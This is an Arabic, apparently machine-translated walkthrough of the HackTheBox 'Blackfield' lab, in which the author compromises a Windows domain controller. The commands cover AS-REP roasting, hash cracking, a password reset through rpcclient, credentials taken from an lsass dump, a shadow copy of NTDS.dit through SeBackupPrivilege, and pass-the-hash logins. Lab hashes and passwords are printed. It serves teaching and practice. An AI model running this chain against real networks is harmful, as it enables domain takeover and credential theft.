هاكذا بوكس. تجول بلاكفيلد. قرصنة وحدة تحكم المجال عبر SMB و RPC و LPE عبر النسخة الاحتياطية



أستمر في نشر الحلول المرسلة لإنهاء الآلات من موقع HackTheBox .



في هذه المقالة ، سأستخدم ASRep Roasting لتعريف المستخدمين ، و RPC لتغيير كلمات المرور والاستيلاء على حساب ، ثم رفع امتيازاتنا باستخدام نسخة الظل NTDS.DIT.



الاتصال بالمختبر عبر VPN. يوصى بعدم الاتصال من كمبيوتر العمل أو من مضيف توجد به بيانات مهمة بالنسبة لك ، حيث تجد نفسك في شبكة خاصة مع أشخاص يعرفون شيئًا عن أمن المعلومات.



المعلومات التنظيمية
, , Telegram . , , .



. , - , .



ريكون



هذا الجهاز لديه عنوان IP هو 10.10.10.192 ، والذي أقوم بإضافته إلى / etc / hosts.



10.10.10.192 	blackfield.htb


الخطوة الأولى هي فحص المنافذ المفتوحة. أفعل ذلك باستخدام النص التالي ، والذي يأخذ وسيطة واحدة - عنوان المضيف الذي يتم فحصه:



#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1






نرى الكثير من المنافذ المفتوحة ، لكن كالعادة ، لنبدأ مع SMB. دعونا نرى ما إذا كان بإمكاننا فعل شيء ما دون تسجيل الدخول.



smbmap -u anonymous -H 10.10.10.192






وملفات تعريف الدليل $ متاحة للقراءة.



smbmap -u anonymous -H 10.10.10.192 -r 'profiles$'2






لدينا قائمة كبيرة من المستخدمين المحتملين. يمكننا التحقق من المستخدمين الموجودين بالفعل في النظام. الحقيقة هي أنه أثناء هجوم ASRep Roasting ، يكون للخادم ثلاثة استجابات مختلفة:



  • تجزئة كلمة مرور المستخدم ؛
  • هذا المستخدم ليس لديه مجموعة UAF Dont Require PreAuth ؛
  • لا يوجد مثل هذا المستخدم في قاعدة بيانات Kerberos.


وبالتالي ، سنكون قادرين على معرفة من هو ومن ليس كذلك.



نقطة الدخول



أولاً ، دعنا نحصل على قائمة.



smbmap -u anonymous -H 10.10.10.192 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt


الآن دعونا نفعل ASRep-Roasting.



GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -k -no-pass -usersfile ./users.txt






وفوجئت عندما أعيد الحشيش إلينا. دعونا نخرمه.



john support.hash -w=./tools/rockyou.txt






ولدينا حساب متحكم فيه بالكامل. الآن دعنا نحصل على أكبر قدر ممكن من المعلومات باستخدام enum4linux.



enum4linux -u support -p '#00^BlackKnight' -a 10.10.10.192 2>/dev/null






سنحصل على قائمة ضخمة من المستخدمين المجهولين ، ولكن الشيء الأكثر إثارة للاهتمام هو عضوية المجموعة. سيخبرنا هذا أن svc_backup موجود في مجموعة RMU (RID: 580) ، والتي تسمح بالاتصالات عن بُعد باستخدام Win-RM.



لا يمكننا أخذ أي شيء آخر من SMB ، لكننا لا نجد أي شيء في LDAP. ولكن في RPC ، كما اتضح ، هناك خدعة واحدة. دعنا نتواصل:



rpcclient 10.10.10.192 -U support






الحقيقة هي أنه من الممكن تغيير كلمة مرور مستخدم بنفس الامتيازات ، كل شيء موصوف بالتفصيل هنا . وتمكنت من القيام بذلك من أجل تدقيق المستخدم 2020.



setuserinfo2 audit2020 18 'ralf'






نبدأ الآن في تحليل جميع الموارد والخدمات من البداية ، حيث لدينا حساب آخر متحكم فيه.



المستعمل



نذهب إلى SMB.



smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192






هناك الكثير لقراءته ، فمن الأفضل عرض كل المحتوى بشكل متكرر ومشاهدته دفعة واحدة.



smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192 -R






وفي مجلد \ memory_analysis الطب الشرعي نجد ، على ما يبدو ، تفريغ لعملية lsass. ومنه يمكننا الحصول على كلمات مرور باستخدام mimikatz. قم بتنزيل هذا الملف.



smbclient.py blackfield.local/audit2020:ralf@10.10.10.192






الآن دعنا نذهب إلى جهاز Windows ونستخدم mimikatz.







ومعرفة التجزئة ، باستخدام Evil-WinRM ، نتواصل نيابة عن svc_backup.



evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d






جذر



دعونا نرى المجموعات وامتيازات المستخدم.







لدينا امتياز SeBackupPrivilege. يمنحنا هذا الحق في إنشاء نسخة احتياطية من ملف NTDS الذي يحتوي على الكثير من بيانات الاعتماد. بعد أن نقوم بإنشاء نسخة ، لا يمكننا ببساطة استخراج الملف المطلوب. لهذا نحن بحاجة إلى ملفات DLL التالية .



لنقم بعمل نسخة احتياطية. لنقم بإنشاء ملف بالمحتوى التالي.



SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias ralfcopy
create
expose %ralfcopy% z:


والآن دعنا نحمله وننزل المكتبات إلى المضيف.







لنقم بإجراء نسخة الظل.



diskshadow /s ds.txt










وتفريغ الملف.



Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit






لكن هذا الملف مشفر ، ومن أجل فك تشفيره نحتاج إلى ملف SYSTEM ، والذي لن يكون مشكلة في الحصول عليه.



reg save HKLM\SYSTEM C:\Temp\SYSTEM






قم بتنزيل كلا الملفين من الجهاز.







ونحصل على التجزئة باستخدام secretsdump من حزمة impacket.



secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL






دعنا نتواصل كمسؤول.



evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee








لدينا سيطرة كاملة على هذا الجهاز.



يمكنك الانضمام إلينا على Telegram . هناك يمكنك العثور على مواد مثيرة للاهتمام ودورات مسربة وبرامج. دعنا نجمع مجتمعًا ، حيث سيكون هناك أشخاص على دراية بالعديد من مجالات تكنولوجيا المعلومات ، ثم يمكننا دائمًا مساعدة بعضنا البعض في أي مشكلات تتعلق بتكنولوجيا المعلومات وأمن المعلومات.



All Articles